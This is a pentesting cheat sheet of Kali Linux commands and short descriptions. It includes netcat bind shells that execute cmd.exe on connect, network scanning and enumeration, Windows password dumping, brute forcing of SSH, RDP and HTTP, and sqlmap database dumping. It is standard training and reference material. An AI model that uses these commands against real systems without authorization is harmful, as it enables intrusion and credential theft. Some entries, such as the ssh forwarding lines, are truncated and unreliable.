

Kali commands list including basic command, netcat/ncat, NMAP, SMB and SNMP enumeration and many more.
Typology: Cheat Sheet


nc -nv target -p port
Connect to a specific port on the target machine
nc -nlvp port -e filename
Listen on a specific port and execute the program after a client connects
ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
Listen on port 4444, allow only 10.0.0.4 to connect, execute cmd.exe after connect, encrypt with SSL
ncat -v 10.0.0.22 4444 --ssl
Connect to the target on port 4444, encrypt with SSL
nmap -v -sS -A -T4 target
Nmap verbose scan: SYN stealth scan, T4 timing (should be OK on a LAN), OS and service version detection, traceroute and default scripts against discovered services
nmap -v -sS -p- -A -T4 target
As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target
As above but scans all TCP ports plus a UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns
Nmap script to scan for vulnerable SMB servers. WARNING: the unsafe=1 script argument may crash the target service
ls /usr/share/nmap/scripts/* | grep ftp
Search the nmap scripts for a keyword
nbtscan 192.168.1.0/24
Discover Windows / Samba servers on the subnet: finds Windows MAC addresses, NetBIOS names and the client workgroup / domain
enum4linux -a target-ip
Do everything: runs all options (find Windows client domain / workgroup) apart from dictionary-based share name guessing
grep "substring" target-file
Extract the lines containing "substring"
grep -o "regex" target-file
Same as above with a regular expression as input
cut -d "/" -f 3
Split the string on "/" and output the third column
sort -u
Remove duplicates
host "hostname"
Return the IP address of the host name
wc -l access.log
Count the number of lines in "access.log"
uniq -c
Prefix each line with its number of occurrences
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -nr
Count the number of occurrences of each value and sort them in reverse order
by A. Wong
mount 192.168.1.1:/vol/share /mnt/nfs
Mount an NFS share at /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount a Windows CIFS / SMB share on Linux at /mnt/cifs; if you omit password= it will prompt on the CLI (more secure, as the password won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
snmpcheck -t 192.168.1.X -c public
SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
SNMP enumeration
snmpenum -t 192.168.1.X
SNMP enumeration
onesixtyone -c names -i hosts
SNMP enumeration
dnsrecon -d megacorpone.com -t axfr
Enumerate and attempt a zone transfer of the target domain
dnsenum zonetransfer.me
Enumerate and attempt a zone transfer of the target domain
nikto -h 192.168.1.1
Perform a nikto scan against the target
dirbuster
Configure via the GUI; CLI input doesn't work most of the time
tcpdump tcp port 80 -w output.pcap -i eth0
tcpdump for port 80 on interface eth0, writes the capture to output.pcap
Wireshark
GUI tool that performs packet inspection
/usr/share/wordlists/
Kali password lists
crunch 6 6 0123456789ABCDEF -o crunch1.txt
Generate a password list using only the characters 0-9 and A-F, length = 6, output to crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
Generate a password list with a specific character set, length = 4
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Generate a password list from the megacorpone website and output to megacorp-cewl.txt
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Mutate the password list according to the rules in john.conf
fgdump.exe
Dump Windows password hashes
wce -w
Dump Windows clear-text passwords
medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
HTTP brute force
ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.
RDP brute force
hydra -P password-file.txt -v 10.11.1. snmp
SNMP brute force
hydra -l root -P password-file.txt 10.11.1.219 ssh
SSH brute force
ssh
Local port forward. 127.0.0.1:
ssh
Remote port forward. Access 127.0.0.1:
ssh -D
Dynamic port forward. We have now created a SOCKS proxy on the local machine.
sqlmap -u http://meh.com --forms --batch
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
Scan the URL for union- and error-based injection with a MySQL backend, use a random user agent, and dump the database
sqlmap -o -u "http://meh.com/form/" --forms
sqlmap: check the form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
sqlmap: dump and crack hashes for table users in database-name